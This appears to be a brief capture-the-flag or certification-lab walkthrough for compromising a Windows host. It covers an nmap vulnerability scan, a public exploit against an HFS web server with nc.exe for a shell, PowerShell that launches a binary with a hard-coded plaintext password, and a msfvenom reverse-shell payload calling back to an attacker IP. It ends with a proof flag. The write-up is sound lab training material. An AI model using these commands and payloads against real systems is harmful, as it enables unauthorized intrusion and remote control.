nmap -T4 -A -sS -sV -vv --script vuln -p- --open -n -Pn 10.11.1.49 -oX 10.11.1.49.xml
xsltproc -o 10.11.1.49.html 10.11.1.49.xml
Port 9505 runs the HttpFileServer (HFS) service. Searching for HFS turns up 39161.py; change the port inside it and place nc.exe where the script expects it.
This gives a shell.
$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("alice", $secpasswd)
$computer = "bethany2"
[System.Diagnostics.Process]::Start("C:\Users\Public\2.exe", "", $mycreds.Username, $mycreds.Password, $computer)
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.11.0.185 LPORT=444 -f exe -o 1.exe
powershell -ExecutionPolicy Bypass -File c:\users\public\msfvenom_test.ps1
Once running as alice, proof.txt can be read.
Alice is already an administrator, so no privilege escalation is needed.
1f1f1eb58e44d5d24e44070b3b29c0d5